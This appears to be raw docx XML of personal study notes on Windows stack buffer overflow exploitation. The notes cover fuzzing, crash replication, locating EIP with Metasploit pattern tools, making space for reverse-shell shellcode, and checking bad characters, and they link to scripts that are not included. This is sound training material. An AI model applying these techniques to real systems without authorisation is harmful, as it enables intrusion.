    <w:p w14:paraId="086741F2" w14:textId="77777777" w:rsidR="00261D13" w:rsidRDefault="00B92BFE" w:rsidP="00C74149">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>F9: start run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="111BD545" w14:textId="1E92AA14" w:rsidR="00570D4D" w:rsidRDefault="00570D4D" w:rsidP="00C74149">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Ctrl+</w:t>
      </w:r>
      <w:r w:rsidR="00FD3C66">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">F1: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>to attach</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="165BF273" w14:textId="77777777" w:rsidR="00261D13" w:rsidRDefault="00261D13" w:rsidP="00C74149">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6070D0DC" w14:textId="77777777" w:rsidR="00261D13" w:rsidRDefault="00261D13" w:rsidP="00C74149">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="34785B3B" w14:textId="7009188D" w:rsidR="00937C12" w:rsidRPr="00261D13" w:rsidRDefault="00261D13" w:rsidP="00261D13">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:jc w:val="center"/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>WINDOWS BUFFER OVERFLOW</w:t>
      </w:r>
      <w:r w:rsidRPr="00261D13">
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:u w:val="single"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D1BDD76" w14:textId="3DFA70DB" w:rsidR="00C74149" w:rsidRDefault="00332D7D" w:rsidP="00817E79">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:u w:val="single"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00332D7D">
        <w:rPr>
          <w:b/>
          <w:u w:val="single"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>DISCOVERING THE VULNERABILITY:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BC867AF" w14:textId="6023866A" w:rsidR="00332D7D" w:rsidRDefault="00332D7D" w:rsidP="00817E79">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00332D7D">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>WE USE</w:t>
      </w:r>
      <w:r w:rsidRPr="00332D7D">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> FUZZING </w:t>
      </w:r>
      <w:r w:rsidRPr="00332D7D">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">MOSTLY SINCE WE WOULD </w:t>
      </w:r>
      <w:r w:rsidRPr="00332D7D">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">NOT HAVE ACCES TO THE CODE SOURCSE </w:t>
      </w:r>
      <w:r w:rsidRPr="00332D7D">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>MOST OF THE TIME</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DE88373" w14:textId="53F0B104" w:rsidR="00332D7D" w:rsidRDefault="00332D7D" w:rsidP="00817E79">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">The goal of fuzzing is to provide the target application with inputs that may cause </w:t>
      </w:r>
      <w:r w:rsidR="00A000B6">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>the application</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> to malfunction or crash unable to process the input data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2121F727" w14:textId="79079D8D" w:rsidR="00F14898" w:rsidRDefault="00F14898" w:rsidP="00817E79">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F14898">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Fuzzing the HTTP Protocol</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2787629B" w14:textId="0E34AC8D" w:rsidR="00195754" w:rsidRDefault="00F14898" w:rsidP="00817E79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 xml:space="preserve">We need to check </w:t>
      </w:r>
      <w:r w:rsidR="00A000B6">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>the input</w:t>
      </w:r>
      <w:r w:rsidR="00F368ED">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> filed of the application as any input field may have buffer overflow not only login page.</w:t>
      </w:r>
      <w:r w:rsidR="00195754">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C10E1E1" w14:textId="1B408E1B" w:rsidR="00195754" w:rsidRDefault="00E75B17" w:rsidP="00817E79">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E75B17">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>STEPS:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="717EEFFA" w14:textId="2DC934E5" w:rsidR="00E75B17" w:rsidRPr="0066080F" w:rsidRDefault="00E75B17" w:rsidP="0066080F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0066080F">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>FUZZING</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78F74885" w14:textId="746BD36E" w:rsidR="00195754" w:rsidRDefault="00195754" w:rsidP="00817E79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>We can use wireshark to build a basic fuzzer tool. (right click&gt;follow) to know the response.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3957022B" w14:textId="19C816E5" w:rsidR="00E75B17" w:rsidRDefault="00E75B17" w:rsidP="00817E79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 xml:space="preserve">BASIC FUZZER: </w:t>
      </w:r>
      <w:hyperlink r:id="rId7" w:history="1">
        <w:r w:rsidRPr="00E75B17">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:cstheme="minorHAnsi"/>
            <w:iCs/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>buffer overflow\windows\windows_overflow_check.py</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">     (ctrl+click)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F210850" w14:textId="5B1AC1A5" w:rsidR="00E75B17" w:rsidRDefault="00E75B17" w:rsidP="00817E79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 xml:space="preserve">We need to run immunity debugger as </w:t>
      </w:r>
      <w:r w:rsidR="00A000B6">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>root for</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> all process to show.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15CC4F6D" w14:textId="3811949C" w:rsidR="00A000B6" w:rsidRDefault="00A000B6" w:rsidP="00817E79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 xml:space="preserve"> DEP:  It is a set of hardware and software technologies that perform additional </w:t>
      </w:r>
      <w:r w:rsidR="006F4411">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>checks on memory to help prevent malicious code from running on a system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A375700" w14:textId="5BB33BB5" w:rsidR="006F4411" w:rsidRDefault="006F4411" w:rsidP="00817E79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>ASLR: It randomizes the base addresses of loaded application and dll every time the os is booted.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06066C7E" w14:textId="77777777" w:rsidR="006F4411" w:rsidRDefault="006F4411" w:rsidP="00817E79">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="62CDA7F7" w14:textId="77777777" w:rsidR="0066080F" w:rsidRPr="0066080F" w:rsidRDefault="0066080F" w:rsidP="0066080F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0066080F">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>REPLICATE THE CRASH USING FIXED BUFFER</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F7CDA2A" w14:textId="77777777" w:rsidR="006F4411" w:rsidRDefault="006F4411" w:rsidP="00817E79">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7D8CCCDC" w14:textId="5EC3ECB4" w:rsidR="006F4411" w:rsidRDefault="00500A2F" w:rsidP="00817E79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 xml:space="preserve">Fixed length buffer:  </w:t>
      </w:r>
      <w:hyperlink r:id="rId8" w:history="1">
        <w:r w:rsidRPr="00500A2F">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:cstheme="minorHAnsi"/>
            <w:iCs/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>buffer overflow\windows\fixed_buffer_flow.py</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">   (ctrl +click).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73D01D5E" w14:textId="77777777" w:rsidR="00570D4D" w:rsidRDefault="00570D4D" w:rsidP="00817E79">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="169872F5" w14:textId="77777777" w:rsidR="00E75B17" w:rsidRDefault="00E75B17" w:rsidP="00817E79">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="092A5EB3" w14:textId="77777777" w:rsidR="00F14B62" w:rsidRPr="0066080F" w:rsidRDefault="00F14B62" w:rsidP="0066080F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0066080F">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>CONTROLING THE EIP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="555E14F9" w14:textId="26AA0072" w:rsidR="00E75B17" w:rsidRDefault="00F14B62" w:rsidP="00817E79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 xml:space="preserve">Controlling the EIP register is the crucial step in buffer overflow. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62DFD52D" w14:textId="005C02DE" w:rsidR="00F14B62" w:rsidRDefault="00F14B62" w:rsidP="00817E79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 xml:space="preserve">We need tom know the </w:t>
      </w:r>
      <w:r w:rsidR="008B0EA8">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> exact location of the eip.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F9B3563" w14:textId="7999700C" w:rsidR="008B0EA8" w:rsidRDefault="008B0EA8" w:rsidP="00817E79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>Methods:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E6C730D" w14:textId="0CBA3146" w:rsidR="008B0EA8" w:rsidRDefault="008B0EA8" w:rsidP="00817E79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>Use binary tree analysis (400a 400b……..400a 200b,200c……)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="090F7662" w14:textId="77777777" w:rsidR="00B500D2" w:rsidRDefault="008B0EA8" w:rsidP="00817E79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 xml:space="preserve">Use metasploit pattern create script:   </w:t>
      </w:r>
      <w:r w:rsidRPr="008B0EA8">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>msf-pattern_create -l 800</w:t>
      </w:r>
      <w:r w:rsidR="00B500D2">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">       </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E17D036" w14:textId="302AB704" w:rsidR="00B500D2" w:rsidRDefault="00B500D2" w:rsidP="00817E79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 xml:space="preserve">To find the offset:   </w:t>
      </w:r>
      <w:r w:rsidRPr="00B500D2">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>msf-pattern_offset -l 800 -q 42306142</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">     (value in eip)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4406D821" w14:textId="77777777" w:rsidR="009F3946" w:rsidRDefault="009F3946" w:rsidP="00817E79">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="559E4D0B" w14:textId="77777777" w:rsidR="009F3946" w:rsidRDefault="009F3946" w:rsidP="00817E79">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="34FE7DC8" w14:textId="14A8B7AF" w:rsidR="009F3946" w:rsidRPr="0066080F" w:rsidRDefault="009F3946" w:rsidP="0066080F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0066080F">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>LOCATING SPACE FOR SHELLCODE:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AC1866F" w14:textId="6A818DE7" w:rsidR="009F3946" w:rsidRDefault="00BC790D" w:rsidP="00817E79">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BC790D">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>A standard</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> reverse shell code    requires about 300 to m400 bytes  of space.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AB3CF78" w14:textId="497DA137" w:rsidR="00E63B32" w:rsidRDefault="00E63B32" w:rsidP="00817E79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>Simple solution is to increase the buffer length and see if there is no change in the buffer overflow conditions.</w:t>
      </w:r>
      <w:r w:rsidR="00D07F72">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D672831" w14:textId="5811BDC7" w:rsidR="00D07F72" w:rsidRDefault="00D07F72" w:rsidP="00817E79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>Methods to create space for our shell code:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68C9E398" w14:textId="0698E21B" w:rsidR="007E14BE" w:rsidRDefault="00D07F72" w:rsidP="00817E79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>Increase the size of buffer and the overflow conditions should not change.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F4CA31F" w14:textId="5560F0AE" w:rsidR="007E14BE" w:rsidRDefault="00AE1480" w:rsidP="007E14BE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>Place the intial shell code in the available place and ask that to point to the shell code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A1AB042" w14:textId="549BC157" w:rsidR="007E14BE" w:rsidRPr="0066080F" w:rsidRDefault="007E14BE" w:rsidP="0066080F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0066080F">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>CHECKING FOR BAD CHARACTERS:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76550D1B" w14:textId="42CE6604" w:rsidR="007E14BE" w:rsidRDefault="0045413E" w:rsidP="0045413E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0045413E">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Depending on the application, vulnerability type, and protoco</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">ls in use, there may be certain </w:t>
      </w:r>
      <w:r w:rsidRPr="0045413E">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>characters that are considered “bad” and should not be used in</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> our buffer, return address, or </w:t>
      </w:r>
      <w:r w:rsidRPr="0045413E">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>shellcode.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="032C8D23" w14:textId="2B811E6A" w:rsidR="0045413E" w:rsidRDefault="0045413E" w:rsidP="0045413E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Eg:</w:t>
      </w:r>
      <w:r w:rsidRPr="0045413E">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve"> 0x00</w:t>
      </w:r>
      <w:r w:rsidRPr="0045413E">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0045413E">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>This char</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">acter is considered bad because </w:t>
      </w:r>
      <w:r w:rsidRPr="0045413E">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>a null byte is also used to terminate a string in low level languages</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13789709" w14:textId="433D87C6" w:rsidR="0045413E" w:rsidRDefault="0045413E" w:rsidP="0045413E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>We can check for bad characters by sending all possible bad characters as part of our buffer and see how our app reacts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DE47900" w14:textId="6FCD7101" w:rsidR="006553EB" w:rsidRDefault="00BE3F69" w:rsidP="0045413E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">Script to check: </w:t>
      </w:r>
      <w:hyperlink r:id="rId9" w:history="1">
        <w:r w:rsidRPr="00BE3F69">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:cstheme="minorHAnsi"/>
            <w:iCs/>
          </w:rPr>
          <w:t>buffer overflow\windows\BAD_CHARACTER.py</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">   (ctrl+click)</w:t>
      </w:r>
    </w:p>
